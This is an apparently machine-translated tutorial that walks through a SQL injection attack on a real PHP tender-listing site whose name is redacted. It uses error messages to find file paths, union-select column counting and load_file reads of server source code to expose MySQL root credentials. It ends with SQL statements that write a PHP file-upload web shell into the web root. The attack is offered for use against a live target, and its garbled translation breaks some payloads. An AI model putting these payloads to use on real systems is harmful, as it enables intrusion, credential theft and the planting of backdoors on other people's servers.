Simple PHP injection testing

The test site is as follows:

Http: // www. ******. com

Find a step

Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830

Submit one

Returned results

Warning: mysql_result (): supplied argument is not a valid MySQL result resource in

/Var/www/html/zhaobiao/zhaobiao_hy_show.php on line 135

Warning: mysql_result (): supplied argument is not a valid MySQL result resource in

/Var/www/html/zhaobiao/zhaobiao_hy_show.php on line 140

Warning: mysql_result (): supplied argument is not a valid MySQL result resource in

/Var/www/html/zhaobiao/zhaobiao_hy_show.php on line 154

The path is out and security check continues.

Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 & #39; and 1 = 1 #

An error is returned, not a struct type.

Note: % 23 is #

Submit and 1 = 1 and return normal

Submission and 1 = 2 returns abnormal

The following is the union statement.

And 1 = 1 union select 1 returns abnormal

And 1 = 1 union select 1, 2 returns abnormal

And 1 = 1 union select 1, 2, 3 returns abnormal

And 1 = 1 union select 1, 2, 3, 4 returns abnormal

And 1 = 1 union select 1, 2, 3, 4, 5 return abnormal

And 1 = 1 union select 1, 2, 3, 4, 5, 6 Returns abnormal

And 1 = 1 union select 1, 2, 4, 5, 6, 7 returns abnormal

And 1 = 1 union select 1, 2, 3, 4, 5, 6, 7, 8 returns abnormal

And 1 = 1 union select 1, 2, 3, 4, 5, 6, 7, 8, 9 return abnormal

And 1 = 1 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 returns abnormal

And 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11 returns abnormal

And 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12 returns abnormal

And 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 returns abnormal

And 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 return normal

It will be normal to guess 14 and continue the next step.

Generally, it is impossible for us to find such a site in the background ..

Let's see if there is any more ..

Guess common paths.

Login. php
Admin. php
Admin_login.php
Admin_index.php
Admin/login. php
Admin/admin. php
Admin/admin_login.php
Admin/admin_index.php
Manage/index. php
Manage/login. php
Manage/admin_login.php
Manage/admin_index.php

Wait. If you have the patience, you can guess it slowly. Even if you have guessed it, it will be useless.

Let's use a direct method. Use load_file to read the file content directly.

Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 and 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14

Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 and 1 = 2 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
And 1 = 1 to and 1 = 2

The returned results are as follows:

2

The file content we need is cracked at location 2.

From/var/www/html/zhaobiao/zhaobiao_hy_show.php

Directly use load_fi

Le (/var/www/html/zhaobiao/zhaobiao_hy_show.php)

The premise is to convert/var/www/html/zhaobiao/zhaobiao_hy_show.php to hexadecimal

Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 and 1 = 2 union select 1, load_file

(Bytes

686F772E706870), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14

Returned results

0 or $ regdate> mysql_result ($ query, 0, yxdate) {?>

", Mysql_result ($ query, 0, sm);?>

Do not worry about this. Check that the source file finds an inc. php file and works with the preceding path.

/Var/www/html/inc. php

Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 and 1 = 2 union select 1, load_file

(0x2f7661722f77772f68746d6c2f696e632e706870), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14

When a brute-force attack returns, you cannot see the content and directly view the source file.

<?
$ Myconn = mysql_connect (localhost, root, www. ******. comy0p5h1i0 );
Mysql_select_db (mlk );
?>

Mysql is exposed ..

The next step is to log on to Mysql and insert the prepared pony ..

Use mlk;
Create table mmxy (cmd TEXT );
Insert into mmxy values (<? Php );
Insert into mmxy values ($ msg = copy ($ _ FILES [MyFile] [tmp_name], $ _ FILES [MyFile] [name])? "Successful": "failure ";);
Insert into mmxy values (echo $ msg ;);
Insert into mmxy values (?> );
Insert into mmxy values (<form ENCTYPE = "multipart/form-data" ACTION = "" METHOD = "POST"> );
Insert into mmxy values (<input NAME = "MyFile" TYPE = "file"> );
Insert into mmxy values (<input VALUE = "Up" TYPE = "submit"> </form> );
Select * from mmxy into outfile/var/www/html/zhaobiao/mmxy. php;